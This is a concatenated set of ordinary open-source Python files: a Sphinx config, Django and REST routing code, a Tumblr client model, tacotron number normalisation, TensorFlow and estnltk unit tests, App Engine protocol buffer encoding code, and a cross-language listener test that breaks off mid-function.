# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
#man_pages = [
# ('man/neutron-server', 'neutron-server', u'Neutron Server',
# [u'OpenStack'], 1)
#]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
#htmlhelp_basename = 'neutrondoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author,
# documentclass [howto/manual]).
latex_documents = [
('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation',
u'Neutron development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664
latex_use_xindy = False
latex_domain_indices = False
latex_elements = {
'extraclassoptions': 'openany,oneside',
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
# -- Options for openstackdocstheme -------------------------------------------
openstackdocs_repo_name = 'openstack/neutron-vpnaas'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'neutron'
openstackdocs_bug_tag = 'doc'
# -- Options for oslo_config.sphinxconfiggen ---------------------------------
_config_generator_config_files = [
'vpn_agent.ini',
'neutron_vpnaas.conf',
]
def _get_config_generator_config_definition(conf):
config_file_path = '../../etc/oslo-config-generator/%s' % conf
# oslo_config.sphinxconfiggen appends '.conf.sample' to the filename,
# strip file extentension (.conf or .ini).
output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0]
return (config_file_path, output_file_path)
config_generator_config_file = [
_get_config_generator_config_definition(conf)
for conf in _config_generator_config_files
]
# -- Options for oslo_policy.sphinxpolicygen ---------------------------------
policy_generator_config_file = '../../etc/oslo-policy-generator/policy.conf'
sample_policy_basename = '_static/neutron-vpnaas'
| openstack/neutron-vpnaas | doc/source/conf.py | Python | apache-2.0 | 8,813 |
"""
WSGI config for wawhfd project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wawhfd.settings")
application = get_wsgi_application()
| calebrash/wawhfd | wawhfd/wsgi.py | Python | mit | 390 |
import os
from AbstractRootModel import AbstractRootModel
import pytumblr
import PostModel
from Settings import Settings
class BlogModel(AbstractRootModel):
def __init__(self, account):
self.client = pytumblr.TumblrRestClient(Settings.OAUTH_CONSUMER, Settings.SECRET)
self.account = account
blog_info = self.client.posts(self.account)
if blog_info.has_key('meta') and blog_info['meta']['status'] != 200:
raise Exception("Unable to connect to Tumblr API. Did you fill in your API OAUTH/SECRET in Settings.py?")
self.name = blog_info['blog']['title']
self.num_posts = blog_info['total_posts']
self.loaded = set()
print "Created model for blog " + self.getName()
""" Overrides AbstractRootModel """
def getName(self):
return self.name
""" Overrides AbstractRootModel """
def getRootPath(self):
return self.account
""" Overrides AbstractRootModel """
def getInfo(self):
info = {}
info['general_desc'] = 'Displaying a Tumblr!'
info['blog_name'] = self.name
return info
def getInfoTemplatePath(self):
return os.path.join('templates','blogInfo.html')
def getNumPosts(self):
return self.num_posts
def getPosts(self, start=0, end=19, types=['photo', 'video']):
n = 0
N = (end + 1) - start
# print "Getting posts. Start idx %d, end idx %d" % (start, end)
posts = []
i = 0
while n < N:
grab = min(N - n, 20)
ps = self.client.posts(self.account, limit=grab, offset= (start + i))
for p in ps['posts']:
if p['type'] in types:
if p['id'] in self.loaded:
# print "DUPE! " + str(p['id'])
continue
self.loaded.add(p['id'])
# print 'post of type ' + p['type'] + '\tid: ' + str(p['id'])
posts.append(PostModel.makePostModel(p))
n += 1
i += 1
post_types = {}
for post in posts:
if not post_types.has_key(post.post_type):
post_types[post.post_type] = 0
post_types[post.post_type] += 1
print 'Retrieved %d posts from %s %s' % (len(posts), self.getName(), str(post_types))
return posts, start + i | bpeck/tumblr-display | src/models/BlogModel.py | Python | apache-2.0 | 2,405 |
import inflect
import re
_inflect = inflect.engine()
_comma_number_re = re.compile(r'([0-9][0-9\,]+[0-9])')
_decimal_number_re = re.compile(r'([0-9]+\.[0-9]+)')
_pounds_re = re.compile(r'£([0-9\,]*[0-9]+)')
_dollars_re = re.compile(r'\$([0-9\.\,]*[0-9]+)')
_ordinal_re = re.compile(r'[0-9]+(st|nd|rd|th)')
_number_re = re.compile(r'[0-9]+')
def _remove_commas(m):
return m.group(1).replace(',', '')
def _expand_decimal_point(m):
return m.group(1).replace('.', ' point ')
def _expand_dollars(m):
match = m.group(1)
parts = match.split('.')
if len(parts) > 2:
return match + ' dollars' # Unexpected format
dollars = int(parts[0]) if parts[0] else 0
cents = int(parts[1]) if len(parts) > 1 and parts[1] else 0
if dollars and cents:
dollar_unit = 'dollar' if dollars == 1 else 'dollars'
cent_unit = 'cent' if cents == 1 else 'cents'
return '%s %s, %s %s' % (dollars, dollar_unit, cents, cent_unit)
elif dollars:
dollar_unit = 'dollar' if dollars == 1 else 'dollars'
return '%s %s' % (dollars, dollar_unit)
elif cents:
cent_unit = 'cent' if cents == 1 else 'cents'
return '%s %s' % (cents, cent_unit)
else:
return 'zero dollars'
def _expand_ordinal(m):
return _inflect.number_to_words(m.group(0))
def _expand_number(m):
num = int(m.group(0))
if num > 1000 and num < 3000:
if num == 2000:
return 'two thousand'
elif num > 2000 and num < 2010:
return 'two thousand ' + _inflect.number_to_words(num % 100)
elif num % 100 == 0:
return _inflect.number_to_words(num // 100) + ' hundred'
else:
return _inflect.number_to_words(num, andword='', zero='oh', group=2).replace(', ', ' ')
else:
return _inflect.number_to_words(num, andword='')
def normalize_numbers(text):
text = re.sub(_comma_number_re, _remove_commas, text)
text = re.sub(_pounds_re, r'\1 pounds', text)
text = re.sub(_dollars_re, _expand_dollars, text)
text = re.sub(_decimal_number_re, _expand_decimal_point, text)
text = re.sub(_ordinal_re, _expand_ordinal, text)
text = re.sub(_number_re, _expand_number, text)
return text
| keithito/tacotron | text/numbers.py | Python | mit | 2,117 |
from rest_framework import routers
from . import views
router = routers.DefaultRouter(trailing_slash=False)
router.register(r'complaints', views.ComplaintViewSet)
urlpatterns = router.urls
| danjac/ownblock | ownblock/ownblock/apps/complaints/urls.py | Python | mit | 192 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.embedding_ops."""
import numpy as np
from tensorflow.python.eager import def_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class EmbeddingLookupTest(test_util.TensorFlowTestCase):
def testEmbeddingLookupOnUninitializedVariableDoesSparseRead(self):
x = resource_variable_ops.UninitializedVariable(
trainable=True, shape=[3, 3], dtype=dtypes.float32)
@def_function.function(input_signature=[])
def _init():
return x.assign(np.zeros([3, 3]))
@def_function.function(input_signature=[])
def _call():
return embedding_ops.embedding_lookup_v2(x, [0])
self.assertAllClose(self.evaluate(_init()), np.zeros([3, 3]))
concrete_call = _call.get_concrete_function()
self.assertAllClose(self.evaluate(concrete_call()), [[0., 0., 0.]])
resource_gather_node = []
read_var_node = []
graph = concrete_call.graph.as_graph_def()
for n in graph.node:
if n.op == "ResourceGather":
resource_gather_node.append(n)
if n.op == "ReadVariableOp":
read_var_node.append(n)
for f in graph.library.function:
for n in f.node_def:
if n.op == "ResourceGather":
resource_gather_node.append(n)
if n.op == "ReadVariableOp":
read_var_node.append(n)
# There should be a single ResourceGather, but no ReadVariableOp
# (dense read).
self.assertLen(resource_gather_node, 1)
self.assertLen(read_var_node, 0)
if __name__ == "__main__":
googletest.main()
| annarev/tensorflow | tensorflow/python/ops/embedding_ops_test.py | Python | apache-2.0 | 2,458 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
"""
Notes
----
Tests must be updated if wordnet file changes. Tests made for wordnet version kb69-a.
"""
import unittest
import sys, os
from ..wordnet import wn, eurown
class InternalSynsetOffsetQueryTest(unittest.TestCase):
def test_empty_query(self):
self.assertListEqual(wn._get_synset_offsets([]),[])
def test_multiple_single_element_queries(self):
idx_offset_pairs = [(1,111),(4967,12606307),(12672,26079737),(34800,58069170),(65518,91684951)]
for i in range(len(idx_offset_pairs)):
self.assertListEqual(wn._get_synset_offsets([idx_offset_pairs[i][0]]),[idx_offset_pairs[i][1]])
def test_ordered_multiple_element_query(self):
idx_offset_pairs = [(7,20473),(5421,13372490),(21450,39305206),(41785,66707187)]
self.assertListEqual(wn._get_synset_offsets([idx_offset_pair[0] for idx_offset_pair in idx_offset_pairs]),[idx_offset_pair[1] for idx_offset_pair in idx_offset_pairs])
def test_unordered_multiple_element_query(self):
idx_offset_pairs = [(21450,39305206),(5421,13372490),(7,20473),(41785,66707187)]
result = wn._get_synset_offsets([idx_offset_pair[0] for idx_offset_pair in idx_offset_pairs])
self.assertTrue(all(offset in result for offset in [idx_offset_pair[1] for idx_offset_pair in idx_offset_pairs]))
class SynsetKeyTest(unittest.TestCase):
def test_key_derivation(self):
lit,pos,sense = "test",'n',7
variant = eurown.Variant(literal=lit,sense=sense)
variants = eurown.Variants()
variants.append(variant)
raw_synset = eurown.Synset(pos=pos, variants=variants)
self.assertEqual(wn._get_key_from_raw_synset(raw_synset),"%s.%s.%02d"%(lit,pos,sense))
class InternalSynsetQuery(unittest.TestCase):
def test_empty_query(self):
self.assertListEqual(wn._get_synsets([]),[])
def test_single_element_query(self):
synset_id,synset_offset,literal,pos,sense = 6,16983,'mõjutamine','n',2
# todo: instead of comparing string representation, compare
# literal, pos and sense variables directly
self.assertEqual(wn._get_synsets([synset_offset])[0].id,synset_id)
"""
class SynsetQuery(unittest.TestCase):
def test_synset_query(self):
synset_id,synset_offset,literal,pos,sense = 6,16983,'mõjutamine','n',2
synset_key = "%s.%s.%02d"%(literal,pos,sense)
synset = wn.synset(synset_key)
self.assertEqual(synset.id, synset_id)
self.assertEqual(synset.name, synset_key)
"""
class SynsetsQuery(unittest.TestCase):
def test_synsets_query(self):
literal = 'aju'
synset_ids = (10433,10434,12095,44798)
self.assertTrue(all(synset.id in synset_ids for synset in wn.synsets(literal)))
class AllSynsetsQuery(unittest.TestCase):
pass
#def test_all_adverbs_query(self):
#self.assertEqual(len(wn.all_synsets('b')),2244)
#def test_all_adjectives_query(self):
#self.assertEqual(len(wn.all_synsets('a')),3076)
#def test_all_verbs_query(self):
#self.assertEqual(len(wn.all_synsets('v')),5748)
#def test_all_nouns_query(self):
#self.assertEqual(len(wn.all_synsets('n')),54449)
class LemmaQuery(unittest.TestCase):
def test_lemma_query(self):
lemma_key = "kolask.n.01.elevant"
self.assertTrue(wn.lemma(lemma_key).name,"elevant")
class AllLemmasQuery(unittest.TestCase):
def test_all_lemmas_query(self):
result = wn.lemmas("kiiresti")
self.assertTrue(len(result),1)
self.assertTrue(result[0].name,"kiiresti")
class MorphyTest(unittest.TestCase):
def test_morphy(self):
self.assertTrue(wn.morphy("karud"),"karu")
class Synset(unittest.TestCase):
def test_get_related_synsets(self):
ahel_synset = wn.synset("ahel.n.02")
hyperonyms = ahel_synset.get_related_synsets('has_hyperonym')
self.assertEqual(hyperonyms[0].name,'rida.n.01')
hyponyms = ahel_synset.get_related_synsets('has_hyponym')
self.assertEqual(hyponyms[0].name,'põhjusahel.n.01')
self.assertEqual(hyponyms[1].name,'mäeahelik.n.01')
def test_closure(self):
real_ancestor_hyperonyms = [(293,'vahend.n.02'),(248,'asi.n.04'),(693,'objekt.n.01'),(8787,'olev.n.02')]
real_ancestor_ids = [id_name[0] for id_name in real_ancestor_hyperonyms]
hoob_synset = wn.synset("hoob.n.01")
ancestor_hyperonyms = hoob_synset.closure('has_hyperonym')
self.assertEqual(len(ancestor_hyperonyms),len(real_ancestor_hyperonyms))
self.assertTrue(all(ancestor.id in real_ancestor_ids for ancestor in ancestor_hyperonyms))
def test_closure_with_custom_depth(self):
real_ancestor_hyperonyms = [(293,'vahend.n.02')]
real_ancestor_ids = [id_name[0] for id_name in real_ancestor_hyperonyms]
hoob_synset = wn.synset("hoob.n.01")
ancestor_hyperonyms = hoob_synset.closure('has_hyperonym',depth=1)
self.assertEqual(len(ancestor_hyperonyms),len(real_ancestor_hyperonyms))
self.assertTrue(all(ancestor.id in real_ancestor_ids for ancestor in ancestor_hyperonyms))
def test_shortest_path_distance_to_itself(self):
source_synset = wn.synset('hulkuma.v.01')
target_synset = wn.synset('hulkuma.v.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),0)
def test_shortest_path_distance_to_parent(self):
source_synset = wn.synset('hiphop.n.01')
target_synset = wn.synset('tantsustiil.n.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),1)
def test_shortest_path_distance_to_sibling(self):
source_synset = wn.synset('hobu.n.01')
target_synset = wn.synset('eesel.n.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),2)
def test_path_similarity_with_itself(self):
source_synset = wn.synset('ilming.n.02')
target_synset = wn.synset('fenomen.n.01')
self.assertEqual(source_synset.path_similarity(target_synset),1)
def test_path_similarity_with_unconnected(self):
pass # would take too much time
def test_path_similarity_with_sibling(self):
source_synset = wn.synset('kaarhall.n.01')
target_synset = wn.synset('näitusehall.n.01')
self.assertEqual(source_synset.path_similarity(target_synset), 1.0/3)
def test_root_min_depth(self):
synset = wn.synset('olev.n.02')
self.assertEqual(synset._min_depth(),0)
def test_arbitrary_min_depth(self):
synset = wn.synset('vahend.n.02')
self.assertEqual(synset._min_depth(),3)
| estnltk/estnltk | estnltk/tests/test_wordnet.py | Python | gpl-2.0 | 6,503 |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import struct
import array
import string
import re
from google.pyglib.gexcept import AbstractMethod
import httplib
__all__ = ['ProtocolMessage', 'Encoder', 'Decoder',
'ProtocolBufferDecodeError',
'ProtocolBufferEncodeError',
'ProtocolBufferReturnError']
URL_RE = re.compile('^(https?)://([^/]+)(/.*)$')
class ProtocolMessage:
def __init__(self, contents=None):
raise AbstractMethod
def Clear(self):
raise AbstractMethod
def IsInitialized(self, debug_strs=None):
raise AbstractMethod
def Encode(self):
try:
return self._CEncode()
except AbstractMethod:
e = Encoder()
self.Output(e)
return e.buffer().tostring()
def SerializeToString(self):
return self.Encode()
def SerializePartialToString(self):
try:
return self._CEncodePartial()
except (AbstractMethod, AttributeError):
e = Encoder()
self.OutputPartial(e)
return e.buffer().tostring()
def _CEncode(self):
raise AbstractMethod
def _CEncodePartial(self):
raise AbstractMethod
def ParseFromString(self, s):
self.Clear()
self.MergeFromString(s)
def ParsePartialFromString(self, s):
self.Clear()
self.MergePartialFromString(s)
def MergeFromString(self, s):
self.MergePartialFromString(s)
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferDecodeError, '\n\t'.join(dbg)
def MergePartialFromString(self, s):
try:
self._CMergeFromString(s)
except AbstractMethod:
a = array.array('B')
a.fromstring(s)
d = Decoder(a, 0, len(a))
self.TryMerge(d)
def _CMergeFromString(self, s):
raise AbstractMethod
def __getstate__(self):
return self.Encode()
def __setstate__(self, contents_):
self.__init__(contents=contents_)
def sendCommand(self, server, url, response, follow_redirects=1,
secure=0, keyfile=None, certfile=None):
data = self.Encode()
if secure:
if keyfile and certfile:
conn = httplib.HTTPSConnection(server, key_file=keyfile,
cert_file=certfile)
else:
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.putrequest("POST", url)
conn.putheader("Content-Length", "%d" %len(data))
conn.endheaders()
conn.send(data)
resp = conn.getresponse()
if follow_redirects > 0 and resp.status == 302:
m = URL_RE.match(resp.getheader('Location'))
if m:
protocol, server, url = m.groups()
return self.sendCommand(server, url, response,
follow_redirects=follow_redirects - 1,
secure=(protocol == 'https'),
keyfile=keyfile,
certfile=certfile)
if resp.status != 200:
raise ProtocolBufferReturnError(resp.status)
if response is not None:
response.ParseFromString(resp.read())
return response
def sendSecureCommand(self, server, keyfile, certfile, url, response,
follow_redirects=1):
return self.sendCommand(server, url, response,
follow_redirects=follow_redirects,
secure=1, keyfile=keyfile, certfile=certfile)
def __str__(self, prefix="", printElemNumber=0):
raise AbstractMethod
def ToASCII(self):
return self._CToASCII(ProtocolMessage._SYMBOLIC_FULL_ASCII)
def ToCompactASCII(self):
return self._CToASCII(ProtocolMessage._NUMERIC_ASCII)
def ToShortASCII(self):
return self._CToASCII(ProtocolMessage._SYMBOLIC_SHORT_ASCII)
_NUMERIC_ASCII = 0
_SYMBOLIC_SHORT_ASCII = 1
_SYMBOLIC_FULL_ASCII = 2
def _CToASCII(self, output_format):
raise AbstractMethod
def ParseASCII(self, ascii_string):
raise AbstractMethod
def ParseASCIIIgnoreUnknown(self, ascii_string):
raise AbstractMethod
def Equals(self, other):
raise AbstractMethod
def __eq__(self, other):
if other.__class__ is self.__class__:
return self.Equals(other)
return NotImplemented
def __ne__(self, other):
if other.__class__ is self.__class__:
return not self.Equals(other)
return NotImplemented
def Output(self, e):
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferEncodeError, '\n\t'.join(dbg)
self.OutputUnchecked(e)
return
def OutputUnchecked(self, e):
raise AbstractMethod
def OutputPartial(self, e):
raise AbstractMethod
def Parse(self, d):
self.Clear()
self.Merge(d)
return
def Merge(self, d):
self.TryMerge(d)
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferDecodeError, '\n\t'.join(dbg)
return
def TryMerge(self, d):
raise AbstractMethod
def CopyFrom(self, pb):
if (pb == self): return
self.Clear()
self.MergeFrom(pb)
def MergeFrom(self, pb):
raise AbstractMethod
def lengthVarInt32(self, n):
return self.lengthVarInt64(n)
def lengthVarInt64(self, n):
if n < 0:
return 10
result = 0
while 1:
result += 1
n >>= 7
if n == 0:
break
return result
def lengthString(self, n):
return self.lengthVarInt32(n) + n
def DebugFormat(self, value):
return "%s" % value
def DebugFormatInt32(self, value):
if (value <= -2000000000 or value >= 2000000000):
return self.DebugFormatFixed32(value)
return "%d" % value
def DebugFormatInt64(self, value):
if (value <= -20000000000000 or value >= 20000000000000):
return self.DebugFormatFixed64(value)
return "%d" % value
def DebugFormatString(self, value):
def escape(c):
o = ord(c)
if o == 10: return r"\n"
if o == 39: return r"\'"
if o == 34: return r'\"'
if o == 92: return r"\\"
if o >= 127 or o < 32: return "\\%03o" % o
return c
return '"' + "".join([escape(c) for c in value]) + '"'
def DebugFormatFloat(self, value):
return "%ff" % value
def DebugFormatFixed32(self, value):
if (value < 0): value += (1L<<32)
return "0x%x" % value
def DebugFormatFixed64(self, value):
if (value < 0): value += (1L<<64)
return "0x%x" % value
def DebugFormatBool(self, value):
if value:
return "true"
else:
return "false"
class Encoder:
NUMERIC = 0
DOUBLE = 1
STRING = 2
STARTGROUP = 3
ENDGROUP = 4
FLOAT = 5
MAX_TYPE = 6
def __init__(self):
self.buf = array.array('B')
return
def buffer(self):
return self.buf
def put8(self, v):
if v < 0 or v >= (1<<8): raise ProtocolBufferEncodeError, "u8 too big"
self.buf.append(v & 255)
return
def put16(self, v):
if v < 0 or v >= (1<<16): raise ProtocolBufferEncodeError, "u16 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
return
def put32(self, v):
if v < 0 or v >= (1L<<32): raise ProtocolBufferEncodeError, "u32 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
self.buf.append((v >> 16) & 255)
self.buf.append((v >> 24) & 255)
return
def put64(self, v):
if v < 0 or v >= (1L<<64): raise ProtocolBufferEncodeError, "u64 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
self.buf.append((v >> 16) & 255)
self.buf.append((v >> 24) & 255)
self.buf.append((v >> 32) & 255)
self.buf.append((v >> 40) & 255)
self.buf.append((v >> 48) & 255)
self.buf.append((v >> 56) & 255)
return
def putVarInt32(self, v):
buf_append = self.buf.append
if v & 127 == v:
buf_append(v)
return
if v >= 0x80000000 or v < -0x80000000:
raise ProtocolBufferEncodeError, "int32 too big"
if v < 0:
v += 0x10000000000000000
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putVarInt64(self, v):
buf_append = self.buf.append
if v >= 0x8000000000000000 or v < -0x8000000000000000:
raise ProtocolBufferEncodeError, "int64 too big"
if v < 0:
v += 0x10000000000000000
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putVarUint64(self, v):
buf_append = self.buf.append
if v < 0 or v >= 0x10000000000000000:
raise ProtocolBufferEncodeError, "uint64 too big"
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putFloat(self, v):
a = array.array('B')
a.fromstring(struct.pack("<f", v))
self.buf.extend(a)
return
def putDouble(self, v):
a = array.array('B')
a.fromstring(struct.pack("<d", v))
self.buf.extend(a)
return
def putBoolean(self, v):
if v:
self.buf.append(1)
else:
self.buf.append(0)
return
def putPrefixedString(self, v):
v = str(v)
self.putVarInt32(len(v))
self.buf.fromstring(v)
return
def putRawString(self, v):
self.buf.fromstring(v)
class Decoder:
def __init__(self, buf, idx, limit):
self.buf = buf
self.idx = idx
self.limit = limit
return
def avail(self):
return self.limit - self.idx
def buffer(self):
return self.buf
def pos(self):
return self.idx
def skip(self, n):
if self.idx + n > self.limit: raise ProtocolBufferDecodeError, "truncated"
self.idx += n
return
def skipData(self, tag):
t = tag & 7
if t == Encoder.NUMERIC:
self.getVarInt64()
elif t == Encoder.DOUBLE:
self.skip(8)
elif t == Encoder.STRING:
n = self.getVarInt32()
self.skip(n)
elif t == Encoder.STARTGROUP:
while 1:
t = self.getVarInt32()
if (t & 7) == Encoder.ENDGROUP:
break
else:
self.skipData(t)
if (t - Encoder.ENDGROUP) != (tag - Encoder.STARTGROUP):
raise ProtocolBufferDecodeError, "corrupted"
elif t == Encoder.ENDGROUP:
raise ProtocolBufferDecodeError, "corrupted"
elif t == Encoder.FLOAT:
self.skip(4)
else:
raise ProtocolBufferDecodeError, "corrupted"
def get8(self):
if self.idx >= self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
self.idx += 1
return c
def get16(self):
if self.idx + 2 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
self.idx += 2
return (d << 8) | c
def get32(self):
if self.idx + 4 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
e = self.buf[self.idx + 2]
f = long(self.buf[self.idx + 3])
self.idx += 4
return (f << 24) | (e << 16) | (d << 8) | c
def get64(self):
if self.idx + 8 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
e = self.buf[self.idx + 2]
f = long(self.buf[self.idx + 3])
g = long(self.buf[self.idx + 4])
h = long(self.buf[self.idx + 5])
i = long(self.buf[self.idx + 6])
j = long(self.buf[self.idx + 7])
self.idx += 8
return ((j << 56) | (i << 48) | (h << 40) | (g << 32) | (f << 24)
| (e << 16) | (d << 8) | c)
def getVarInt32(self):
b = self.get8()
if not (b & 128):
return b
result = long(0)
shift = 0
while 1:
result |= (long(b & 127) << shift)
shift += 7
if not (b & 128):
if result >= 0x10000000000000000L:
raise ProtocolBufferDecodeError, "corrupted"
break
if shift >= 64: raise ProtocolBufferDecodeError, "corrupted"
b = self.get8()
if result >= 0x8000000000000000L:
result -= 0x10000000000000000L
if result >= 0x80000000L or result < -0x80000000L:
raise ProtocolBufferDecodeError, "corrupted"
return result
def getVarInt64(self):
result = self.getVarUint64()
if result >= (1L << 63):
result -= (1L << 64)
return result
def getVarUint64(self):
result = long(0)
shift = 0
while 1:
if shift >= 64: raise ProtocolBufferDecodeError, "corrupted"
b = self.get8()
result |= (long(b & 127) << shift)
shift += 7
if not (b & 128):
if result >= (1L << 64): raise ProtocolBufferDecodeError, "corrupted"
return result
return result
def getFloat(self):
if self.idx + 4 > self.limit: raise ProtocolBufferDecodeError, "truncated"
a = self.buf[self.idx:self.idx+4]
self.idx += 4
return struct.unpack("<f", a)[0]
def getDouble(self):
if self.idx + 8 > self.limit: raise ProtocolBufferDecodeError, "truncated"
a = self.buf[self.idx:self.idx+8]
self.idx += 8
return struct.unpack("<d", a)[0]
def getBoolean(self):
b = self.get8()
if b != 0 and b != 1: raise ProtocolBufferDecodeError, "corrupted"
return b
def getPrefixedString(self):
length = self.getVarInt32()
if self.idx + length > self.limit:
raise ProtocolBufferDecodeError, "truncated"
r = self.buf[self.idx : self.idx + length]
self.idx += length
return r.tostring()
def getRawString(self):
r = self.buf[self.idx:self.limit]
self.idx = self.limit
return r.tostring()
class ProtocolBufferDecodeError(Exception): pass
class ProtocolBufferEncodeError(Exception): pass
class ProtocolBufferReturnError(Exception): pass
| SRabbelier/Melange | thirdparty/google_appengine/google/net/proto/ProtocolBuffer.py | Python | apache-2.0 | 14,205 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from foo_receiver import FooReceiver
from foo_listener_bf import FooListenerBfHelper
from PyCFFIlib_cffi import ffi, lib
import gc
class FooListenerBfImpl:
def delete_fl_in_fl(self):
print ("Not to be used")
def on_string_change(self, prs):
print ("FooListenerImpl.py: on_string_change prs", prs)
self._prs = prs
return self._prs
def get_string(self):
return self._prs
def set_listener_bf(self,fl):
self._fl = fl
def get_listener_bf(self):
return self._fl
def set_binary(self,b):
print ("setting Binary in FooListenerBfImpl ", b)
self._b = b
def get_binary(self):
return self._b
def send_return(self,fl):
return fl
def create():
# TODO: decide if we want to have this here or make checks in the helper.frompy for all
# methods to exist as attributes on the class more lenient
print ("I don't use it but the +p +c plus the check in fromPy for having all methods needs me to have this")
def fr_set_get(fr, fl, s):
fr.add_listener_bf(fl)
assert fr.set_private_bf_string(s) == s, "test_interface_back_forth failed"
# assert fl._prs == s, "test_interface_back_forth failed"
assert fr.get_listener_bf_string() == s, "test_interface_back_forth failed"
# back and forth via regular calls from python to cpp
def test_interface_back_forth():
print ("start test len ", len(FooListenerBfHelper.c_data_set))
fr = FooReceiver.create()
fl = FooListenerBfImpl() # python implementation of listener
fl_cpp = fr.get_foo_listener_bf() # cpp implementation of listener
# both direct and indirect test for python impl of FooListenerBf
fr_set_get(fr, fl, "Hello world!")
# both direct and indirect test for cpp impl of FooListenerBf
fr_set_get(fr, fl_cpp, "Goodbye world!")
fr_set_get(fr, fl_cpp, "Goodbye world!")
# send python implementation back and forth and see that it can still be used, and that no wrapper was added
fl_1 = fr.send_return(fl)
fl_2 = fr.send_return(fl_1)
fr_set_get(fr, fl_2, "Hello")
assert fl == fl_1 and fl_1 == fl_2, "test_interface_back_forth failed"
# send cpp implementation back and forth and see that is can still be used, and handles hold same implementation
fl_cpp_1 = fr.send_return(fl_cpp)
fl_cpp_2 = fr.send_return(fl_cpp_1)
